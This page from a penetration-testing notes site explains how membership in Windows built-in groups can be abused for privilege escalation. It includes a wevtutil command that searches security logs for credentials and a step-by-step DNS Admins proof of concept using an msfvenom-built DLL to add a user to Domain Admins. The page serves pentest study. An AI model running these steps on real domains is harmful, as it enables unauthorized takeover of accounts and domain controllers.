πŸ““
Sfoffo - Pentesting Notes
View on GitHub
  • 🏠/home/sfoffo/.pt-notes
  • 🏳️Contributions
    • 2024 Contributions
      • CVE-2024-42845
      • CVE-2024-41819
      • CVE-2024-41943
      • CVE-2024-50344
  • πŸ€Support this Project
  • πŸ“‚Active Directory
    • Initial Access
    • Internal Enumeration & Lateral Movement
    • Privilege Escalation to Domain Admin using Known Exploits
    • Domain Trusts
  • 🐧Linux Privilege Escalation
    • Enumerating Attack Vectors
    • Privileged Groups
    • Environment Variables Abuse
    • Capabilities Abuse
    • Programs, Jobs and Services
    • Miscellaneous Techniques
    • Recent CVEs
  • πŸͺŸWindows Privilege Escalation
    • Enumerating Attack Vectors
    • Excessive User Rights Abuse
    • Built-in Groups Abuse
    • File System ACLs
    • Services Hijacking
    • User Account Control (UAC) Bypass
    • Living off the Land
  • πŸ›Bug Bounty Hunting
    • Bug Bounty Tools
  • πŸ•ΈοΈWeb Applications
    • Web Attacks
      • Cross Site Scripting (XSS)
      • SQL Injection (SQLi)
      • File Upload Vulnerabilities
      • Insecure Direct Object References (IDOR)
      • OS Command Injection
      • Local File Inclusion (LFI)
      • Remote File Inclusion (RFI)
      • XML External Entities (XXE)
      • HTTP Verb Tampering
    • Web Technologies
      • Tomcat
      • CGI Applications
      • WordPress
      • WebDav
      • Microsoft IIS
      • SAP Netweaver
      • Joomla
      • Drupal
      • Gitlab
      • Jenkins
      • osTicket
      • PRTG Network Monitor
      • Splunk
    • Fuzzing
  • πŸ”Information Gathering
  • πŸ“œProtocols and Services
    • DNS
    • FTP
    • IMAP
    • IPMI
    • MSSQL
    • MySQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • SMB
    • SMTP
    • SNMP
  • πŸ‘ΎUtilities, Scripts and Payloads
    • Shells and Payloads
    • Metasploit Framework
    • File Transfers
    • Pivoting, Tunneling, Port Forwarding
    • Password Attacks
Powered by GitBook
On this page
  • Backup Operators Group
  • Event Log Readers Group
  • Server Operators Group
  • Print Operators Group
  • Hyper-V Administrators Group
  • DNS Admins Group
  • Account Operators Group
  • Remote Desktop Users Group
  • Remote Management Users Group

Was this helpful?

Edit on GitHub
  1. Windows Privilege Escalation

Built-in Groups Abuse

Backup Operators Group

  • Membership of this group grants its members the SeBackup and SeRestore privileges.

  • This group also permits logging in locally to a domain controller.


Event Log Readers Group

  • Organizations may enable logging of process command lines to help defenders monitor and identify malicious behavior

  • Members of this group may read these logs, potentially finding user credentials

  • Search security logs containing the word /user with the built-in utility wevtutil: wevtutil qe Security /rd:true /f:text | Select-String "/user"


Server Operators Group

  • This group allows members to administer Windows servers without needing assignment of Domain Admin privileges.

  • It is a very highly privileged group that can log in locally to servers, including Domain Controllers.

  • Members can modify services, access SMB shares, and backup files.

  • Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.


Print Operators Group

  • Members of this group are granted the SeLoadDriver privilege

  • Members can log on to DCs locally and "trick" Windows into loading a malicious driver.

  • This is a good privilege to perform privilege escalation (see above in the SeLoadDriverPrivilege section)

  • If we issue the command whoami /priv, and don't see the SeLoadDriverPrivilege from an unelevated context, we will need to bypass UAC


Hyper-V Administrators Group

  • The Hyper-V Administrators group has full access to all Hyper-V features.

  • If Domain Controllers have been virtualized, then the virtualization admins should be considered Domain Admins.

  • They can easily create a clone of the live Domain Controller and mount the virtual disk offline to obtain the NTDS.dit file and extract NTLM password hashes for all users in the domain.

  • Whenever possible, we can leverage CVE-2018-0952 or CVE-2019-0841 to gain SYSTEM privileges.

  • Otherwise, we can try to take advantage of an application on the server that has installed a service running in the context of SYSTEM, which is startable by unprivileged users.


DNS Admins Group

  • Members can load a DLL on a DC, but do not have the necessary permissions to restart the DNS server.

  • They can load a malicious DLL and wait for a reboot as a persistence mechanism.

  • Loading a DLL will often result in the service crashing.

  • PoC to add a member to the Domain Admins Group:

    1. Generate dll: msfvenom -p windows/x64/exec cmd='net group "domain admins" TARGETUSER /add /domain' -f dll -o adduser.dll

    2. Transfer the file to the target machine

    3. Load a custom DLL: dnscmd.exe /config /serverlevelplugindll C:path\to\adduser.dll

    4. CMD only: sc stop dns

    5. CMD only: sc start dns

    6. Confirm group membership: net group "Domain Admins" /dom


Account Operators Group

  • Members can modify non-protected accounts and groups in the domain.


Remote Desktop Users Group

  • Members are not given any useful permissions by default

  • The main use of members of this group are to Login Through Remote Desktop Services and can move laterally using the RDP protocol.


Remote Management Users Group

  • Members can log on to DCs with PSRemoting

  • This group is sometimes added to the local remote management group on non-DCs

Last updated 1 year ago

Was this helpful?

A more reliable way to exploit this group is to use .

πŸͺŸ
cube0x0's exploit